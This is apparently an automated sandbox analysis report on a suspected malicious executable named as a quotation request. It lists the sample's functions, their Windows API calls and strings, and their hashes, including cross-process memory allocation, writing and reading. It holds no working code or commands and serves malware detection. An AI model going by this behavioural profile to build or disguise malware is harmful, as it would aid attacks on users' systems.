Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 5e7902ce62e5a93c1f281ef799286009fdfc4b0c2843adcde42ef9ca7f796b9f
Instruction ID: f6f47a06013d93026f2dfa4b3a005726ae4033506910c7609e638e169e2ea751
Opcode Fuzzy Hash: 5e7902ce62e5a93c1f281ef799286009fdfc4b0c2843adcde42ef9ca7f796b9f
Instruction Fuzzy Hash: 92116B72904308BFD7219FBDDC08A9F7FACEB86320F04429AF994D7240D67A890087A0

Function 01028202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0102821E
GetLastError.KERNEL32(?,01027CE2,?,?,?), ref: 01028228
GetProcessHeap.KERNEL32(00000008,?,?,01027CE2,?,?,?), ref: 01028237
HeapAlloc.KERNEL32(00000000,?,01027CE2,?,?,?), ref: 0102823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 01028255

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 93cadc16216151516f3780b61926a5d8b90573ec759c075b9cbc083cffd55d75
Instruction ID: 7551471a3832f0ce7333b9da6c7216f2207db310edd489f00ff15544a30fe064
Opcode Fuzzy Hash: 93cadc16216151516f3780b61926a5d8b90573ec759c075b9cbc083cffd55d75
Instruction Fuzzy Hash: 8A016D75201315BFEB205FA9DC48D6B7FECEF8A654B50446AF989C3210DA3A8C04CB70

Function 0102710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01027044,80070057,?,?,?,01027455), ref: 01027127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01027044,80070057,?,?), ref: 01027142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01027044,80070057,?,?), ref: 01027150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01027044,80070057,?), ref: 01027160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01027044,80070057,?,?), ref: 0102716C

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 68a6dac7f5cafe24e47f9b39f343e934e4f26fcb57c7e1b228e3b44c728a90d5
Instruction ID: 84e9df0dcebaef203f6b88bc21edf270a50a44b62911152a2efec54fbb56d00a
Opcode Fuzzy Hash: 68a6dac7f5cafe24e47f9b39f343e934e4f26fcb57c7e1b228e3b44c728a90d5
Instruction Fuzzy Hash: 86018476601325BBDB214F68DC44BABBFEEEF44651F244054FE84D2214D73ADD408BA0

Function 01035244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 01035260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0103526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 01035276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 01035280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 010352BC

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 7dcccba414e16e9ac9be0cb63ab2a4e062831420a760d87b32b591aa2e0b7b41
Instruction ID: 2ed5e882f1aabf1f8a0bf5a05fe1d1a75ab7b9bcd1c6918f782ee872059abc09
Opcode Fuzzy Hash: 7dcccba414e16e9ac9be0cb63ab2a4e062831420a760d87b32b591aa2e0b7b41
Instruction Fuzzy Hash: 2A015731D0161ADBCF10EFE4E8489EEBB78FB4A311F400446EA81B2194CB39555087A5

Function 010280A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 010280C0
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 010280CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 010280D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 010280E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 010280F6

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: c7be52eed0893dd56925626d419155394db7cfe242ba133b96e5eb66590dc76d
Instruction ID: 58d6f391577b316411e4292daca5efde3acb303e9d71d1f4be60e4dcf6e88151
Opcode Fuzzy Hash: c7be52eed0893dd56925626d419155394db7cfe242ba133b96e5eb66590dc76d
Instruction Fuzzy Hash: 54F0C234205315AFEB211FA8EC8CE6B3FECEF4A754B144056F985C3180CB6A9840DB60

Function 0102C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0102C1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 0102C20E
MessageBeep.USER32(00000000), ref: 0102C226
KillTimer.USER32(?,0000040A), ref: 0102C242
EndDialog.USER32(?,00000001), ref: 0102C25C

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 0ecb5a14d0dedbc5fe7c6f26c8a10beb915a0efa00bac4b880859ba2e3eeda1b
Instruction ID: c187b373c758b01c5cadd3ff0361f2100c26b97936fbc0ce42312d3ed6bd9a95
Opcode Fuzzy Hash: 0ecb5a14d0dedbc5fe7c6f26c8a10beb915a0efa00bac4b880859ba2e3eeda1b
Instruction Fuzzy Hash: 0801843040431597FB306B64DD4EF9B7BA8BB05705F000259E6C6914D19BA965488B50

Function 00FD13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00FD13BF
StrokeAndFillPath.GDI32(?,?,0100B888,00000000,?), ref: 00FD13DB
SelectObject.GDI32(?,00000000), ref: 00FD13EE
DeleteObject.GDI32 ref: 00FD1401
StrokePath.GDI32(?), ref: 00FD141C

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 4f3cdb44ced7cbaceb894b7cdfcec44aafee675d3ddb3dd1c4caf9e5d5c1959e
Instruction ID: fcfb51b793a010f432a15937d82e8ff28e108b4522185b187d29b06d037c17aa
Opcode Fuzzy Hash: 4f3cdb44ced7cbaceb894b7cdfcec44aafee675d3ddb3dd1c4caf9e5d5c1959e
Instruction Fuzzy Hash: 73F0C931005309ABDB329F66EC5C75A3BA5B702326F1C8216F4A9991F8C73F4995EF50

Function 00FE2CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00FF0DB6: std::exception::exception.LIBCMT ref: 00FF0DEC
Part of subcall function 00FF0DB6: __CxxThrowException@8.LIBCMT ref: 00FF0E01

Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22

Part of subcall function 00FD7A51: _memmove.LIBCMT ref: 00FD7AAB

__swprintf.LIBCMT ref: 00FE2ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00FE2D66

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 03ce1393fef3252eef1a6917db008c685c6b96ff2b254669f9854fa493010223
Instruction ID: b4863e5cfda650b442068804bec9783a272e0ba9415f46b31b6b2c1cefb4bbcc
Opcode Fuzzy Hash: 03ce1393fef3252eef1a6917db008c685c6b96ff2b254669f9854fa493010223
Instruction Fuzzy Hash: E9919A725083519FC714EF28CC85C6EB7A9EF85710F04091EF9829B2A1EA78ED44EB52

Function 0103B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FD4743,?,?,00FD37AE,?), ref: 00FD4770

CoInitialize.OLE32(00000000), ref: 0103B9BB
CoCreateInstance.OLE32(01062D6C,00000000,00000001,01062BDC,?), ref: 0103B9D4
CoUninitialize.OLE32 ref: 0103B9F1

Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
Part of subcall function 00FD9837: __swprintf.LIBCMT ref: 00FD98AC

Strings

.lnk, xrefs: 0103B99D, 0103B9AB

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 7904c3eeba037b559020691032510575da6c37b4e8185308db7745934e6c0d3c
Instruction ID: 21f12f476eec421795d1c7e5b90057d34d1c3c985262ac0ef329aa30b90309ce
Opcode Fuzzy Hash: 7904c3eeba037b559020691032510575da6c37b4e8185308db7745934e6c0d3c
Instruction Fuzzy Hash: 71A168756043059FC714EF14C884D2ABBEAFF89718F088989F8999B362CB75EC45CB91

Function 00FF501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00FF50AD

Part of subcall function 010000F0: __87except.LIBCMT ref: 0100012B

Strings

pow, xrefs: 00FF5085, 00FF50A2

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: fce1586714ea808536ba15585c818c8b58b618aaab200636873d971532aa26d2
Instruction ID: e9903e35871a7c2f509409aa6207fb7e30fad0fd62ef9dcb732fd7fc987e8d7f
Opcode Fuzzy Hash: fce1586714ea808536ba15585c818c8b58b618aaab200636873d971532aa26d2
Instruction Fuzzy Hash: 5D513071D0890B96F7236618C9103BE3BD49F40BA0F208D99F7D5452FDDE3989C4AB86

Function 00FE6192 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FE6248
_memmove.LIBCMT ref: 00FE62E4
_memset.LIBCMT ref: 00FE6308

Strings

ERCP, xrefs: 00FE61B3

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: f3754cf8a93f4a7373c65baa1d1a47e09561b7c83ba1a76e224cccdf44336ee3
Instruction ID: 3524e4bcb40fbb2b52e9e0058e3fb3f20cfafa5c55fca4d38473a8de96eb5ae6
Opcode Fuzzy Hash: f3754cf8a93f4a7373c65baa1d1a47e09561b7c83ba1a76e224cccdf44336ee3
Instruction Fuzzy Hash: 3951B071900709DFDB24EF66C8817AABBE4EF54354F20856EE98AD7251E734AA40DB40

Function 010297F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 010314BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,01029296,?,?,00000034,00000800,?,00000034), ref: 010314E6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0102983F

Part of subcall function 01031487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,010292C5,?,?,00000800,?,00001073,00000000,?,?), ref: 010314B1

Part of subcall function 010313DE: GetWindowThreadProcessId.USER32(?,?), ref: 01031409
Part of subcall function 010313DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0102925A,00000034,?,?,00001004,00000000,00000000), ref: 01031419
Part of subcall function 010313DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0102925A,00000034,?,?,00001004,00000000,00000000), ref: 0103142F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 010298AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 010298F9

Strings

@, xrefs: 01029911

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 0d2fa37bda3a28d4db1a01f9d1359d5d77212147586b6148232c42caaf65b9c1
Instruction ID: adc1410d350102cac329800d02fdfe058ea939134a6a4af6e42239e27167e5ce
Opcode Fuzzy Hash: 0d2fa37bda3a28d4db1a01f9d1359d5d77212147586b6148232c42caaf65b9c1
Instruction Fuzzy Hash: FF41617690122DBFDB10DFA8CD81ADEBBB8EF59700F004095FA85B7180DA756E45CBA0

Function 01057946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0105F910,00000000,?,?,?,?), ref: 010579DF
GetWindowLongW.USER32 ref: 010579FC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 01057A0C

Strings

SysTreeView32, xrefs: 010579B1

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 7e7966d5e3a0538ee1bc7c71febd82b6ca29dc9a3c656ee4dbbaafee8daa73ad
Instruction ID: 9dbfa1fb0185f1013433ca85e3cf617e160b69fba403abf96f9946c9a9f4a13d
Opcode Fuzzy Hash: 7e7966d5e3a0538ee1bc7c71febd82b6ca29dc9a3c656ee4dbbaafee8daa73ad
Instruction Fuzzy Hash: 95310131200206ABDB918E38CC05BEB7BA9FF45324F644715FDB5932D0D735E950AB60

Function 010573D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 01057461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 01057475
SendMessageW.USER32(?,00001002,00000000,?), ref: 01057499

Strings

SysMonthCal32, xrefs: 0105742C

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: f93e34ff16b593fdbf31acba51e99a8f02b83d610eefd7ad54ec2c0759dc4765
Instruction ID: 602cfa531fb149d37b2a81200ef306b00292af770c83bd869d6667485413d5b9
Opcode Fuzzy Hash: f93e34ff16b593fdbf31acba51e99a8f02b83d610eefd7ad54ec2c0759dc4765
Instruction Fuzzy Hash: E621B132500219ABDF228E64CC45FEB3FAAFB48724F110154FE956B190DB75A851DBA0

Function 01057B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 01057C4A
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 01057C58
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01057C5F

Strings

msctls_updown32, xrefs: 01057BC4

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 4a6f5d9cfb8a0c0c0507243c12513ef6fcac6780f97d44bb57951b79bb189c27
Instruction ID: adeda2ac695ea028d8a942df262576c2bb0e6fddd6016c7a19d32674af04b59f
Opcode Fuzzy Hash: 4a6f5d9cfb8a0c0c0507243c12513ef6fcac6780f97d44bb57951b79bb189c27
Instruction Fuzzy Hash: A12171B5600209AFEB51DF28DCD1DA73BEDEF4A354B540059FA519B351CA36EC019B60

Function 01056CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 01056D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 01056D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 01056D70

Strings

Listbox, xrefs: 01056D08

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: f04a5a7c987ced840dd6d17d7472b1494632de1df3ff85640afc311049406ca1
Instruction ID: 5d7d28e005c445745e9587fc172e475174e1d4ed042dab0837700dd598cd007a
Opcode Fuzzy Hash: f04a5a7c987ced840dd6d17d7472b1494632de1df3ff85640afc311049406ca1
Instruction Fuzzy Hash: 5421C532600118BFDF629F58CC44FBB3BBAFF89750F418164F9859B191C6769C5187A0

Function 0105770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 01057772
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 01057787
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 01057794

Strings

msctls_trackbar32, xrefs: 01057749

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
